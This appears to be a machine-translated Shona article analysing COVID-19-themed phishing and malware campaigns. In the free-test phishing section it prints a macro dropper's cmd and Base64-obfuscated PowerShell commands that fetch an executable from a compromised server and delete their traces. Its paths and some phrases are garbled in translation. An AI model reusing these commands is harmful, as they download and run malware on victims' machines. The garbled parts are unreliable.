Varwi vanoenderera mberi nekushandisa iyo COVID-19 musoro, vachigadzira kutyisidzira kwakawanda kune vashandisi vanofarira chaizvo zvese zvine chekuita nedenda. IN Takatotaura nezvemhando dzipi dzemarware dzakaonekwa mushure meiyo coronavirus, uye nhasi tichataura nezve magariro einjiniya maitiro ayo vashandisi munyika dzakasiyana, kusanganisira Russia, vakatosangana nazvo. General maitiro uye mienzaniso iri pasi pekucheka.
Rangarira mukati Takataura nezve chokwadi chekuti vanhu vanoda kuverenga kwete chete nezve coronavirus uye mafambiro echirwere ichi, asiwo nezve nhanho dzekutsigira mari? Heino muenzaniso wakanaka. Kurwiswa kunonakidza kwe phishing kwakawanikwa mudunhu reGerman reNorth Rhine-Westphalia kana NRW. Vapambi vakagadzira makopi ewebhusaiti yeMinistry of Economy (), apo chero munhu anogona kunyorera rubatsiro rwemari. Chirongwa chakadaro chiriko chaizvo, uye chakazove chinobatsira kune scammers. Mushure mekugamuchira iyo data yega yevakabatwa, vakaita chikumbiro pawebhusaiti chaiyo yehushumiri, asi vakaratidza mamwe mabhengi. Zvinoenderana nedata repamutemo, zviuru zvina zvikumbiro zvenhema zvakadaro zvakaitwa kudzamara chirongwa chawanikwa. Nekuda kweizvozvo, $4 miriyoni yakaitirwa vagari vakawirwa nenjodzi yakawira mumaoko emakororo.
Ungade bvunzo yemahara yeCOVID-19?
Mumwe muenzaniso wakakosha weiyo coronavirus-themed phishing yaive muma email. Iwo mameseji akakwezva kutarisisa kwevashandisi nechirongwa chekuongororwa mahara hutachiona hwekoronavirus. Mukubatanidzwa kweizvi pakanga paine zviitiko zveTrickbot/Qakbot/Qbot. Uye avo vaida kuongorora utano hwavo pavakatanga βkuzadza fomu rakanamirwa,β rugwaro rwakashata rwakadhaunirodhwa pakombiyuta. Uye kuitira kuti udzivise kuongorora sandboxing, script yakatanga kurodha hutachiona hombe mushure menguva yakati, apo masisitimu ekudzivirira aive nechokwadi chekuti hapana chakaipa chaizoitika.
Kunyengetedza vashandisi vazhinji kugonesa macros kwaive zvakare nyore. Kuti uite izvi, hunyengeri hwakajairika hwakashandiswa: kuzadza rondedzero, iwe unofanirwa kutanga wagonesa macros, izvo zvinoreva kuti unofanirwa kumhanya VBA script.
Sezvauri kuona, iyo VBA script yakavharwa zvakanyanya kubva kune antiviruses.
Windows ine chekumirira chinomirira application /T <seconds> isati yagamuchira iyo yakasarudzika "Hongu" mhinduro. Kwatiri, script yakamirira 65 seconds isati yadzima mafaira enguva pfupi:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Uye ndichimirira, malware yakatorwa. Yakakosha PowerShell script yakatangwa kune izvi:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Mushure mekudhidha kukosha kweBase64, iyo PowerShell script inodhawunirodha yekuseri iri pane yakambobiwa web server kubva kuGermany:
http://automatischer-staubsauger.com/feature/777777.pnguye anorichengeta pasi pezita:
C:UsersPublictmpdirfile1.exe
forodha βC:UsersPublictmpdirβ inodzimwa paunenge uchimhanyisa iyo 'tmps1.bat' faira rine rairo cmd /c mkdir ""C:UsersPublictmpdir"".
Targeted kurwisa masangano ehurumende
Pamusoro pezvo, vaongorori veFireEye nguva pfupi yadarika vakashuma kurwiswa kwakanangana neAPT32 kwakanangana nezvivakwa zvehurumende muWuhan, pamwe neChinese Ministry of Emergency Management. Imwe yemaRTF yakagoverwa yaive nelink yeNew York Times chinyorwa chine musoro . Nekudaro, pakuiverenga, malware yakatorwa (FireEye vanoongorora vakaratidza muenzaniso seMETALJACK).
Sezvineiwo, panguva yekuonekwa, hapana kana maantivirus akawana chiitiko ichi, maererano neVirustotal.
Kana mawebhusaiti epamutemo ari pasi
Muenzaniso unoshamisa wekurwiswa kwe phishing wakaitika muRussia rimwe zuva. Chikonzero cheizvi chaive kugadzwa kwebhenefiti yakamirirwa kwenguva refu yevana vane makore matatu kusvika gumi nematanhatu. Pakaziviswa kutanga kwekugamuchira zvikumbiro muna Chivabvu 3, 16, mamirioni akamhanyira kuwebhusaiti yeHurumende Services kuti awane rubatsiro rwakamirirwa kwenguva refu uye akaunza pasi portal zvisina kuipa kupfuura kurwiswa kwehunyanzvi DDoS. Mutungamiriri wenyika paakati "Masevhisi eHurumende haakwanise kubata nekuyerera kwezvikumbiro," vanhu vakatanga kutaura pamhepo nezve kutangwa kweimwe saiti yekugamuchira zvikumbiro.
Dambudziko nderekuti nzvimbo dzinoverengeka dzakatanga kushanda kamwechete, uye nepo imwe, iyo chaiyo pa posobie16.gosuslugi.ru, inogamuchira zvikumbiro, zvimwe. .
Shamwari dzepaSearchInform dzakawana nzvimbo dzinosvika makumi matatu dzehutsotsi mu.ru zone. Infosecurity uye Softline Kambani yakateedzera anopfuura makumi manomwe ekunyepedzera ehurumende mawebhusaiti ebasa kubva kutanga kwaKubvumbi. Vagadziri vavo vanobata zviratidzo zvinozivikanwa uye vanoshandisawo misanganiswa yemazwi gosuslugi, gosuslugi-30, vyplaty, covid-vyplaty, posobie, zvichingodaro.
Hype uye social engineering
Yese iyi mienzaniso inongosimbisa kuti vanorwisa vari kubudirira kuita mari nyaya yekoronavirus. Uye iyo yakakwira kunetsana kwevanhu uye nenyaya dzisinganyatso jeke, ndipo panowedzera mikana yevatsotsi yekuba data rakakosha, kumanikidza vanhu kuti vape mari yavo vega, kana kungobaya mamwe makomputa.
Uye nekupihwa kuti denda rakamanikidza vanhu vangangove vasina kugadzirira kuti vashande kubva kumba kwakawanda, kwete zvega, asiwo data rekambani riri panjodzi. Semuenzaniso, nguva pfupi yadarika Microsoft 365 (yaimbova Office 365) vashandisi vakaiswawo pasi pekurwiswa kwehutsotsi. Vanhu vakagamuchira mameseji ezwi makuru "akarasika" sezvinamatidzwa kumabhii. Nekudaro, iwo mafaera aive chaiwo peji reHTML rakatumira vakakuvadzwa nekurwiswa . Nekuda kweizvozvo, kurasikirwa kwekuwana uye kukanganisa kwese data kubva kuaccount.
Source: www.habr.com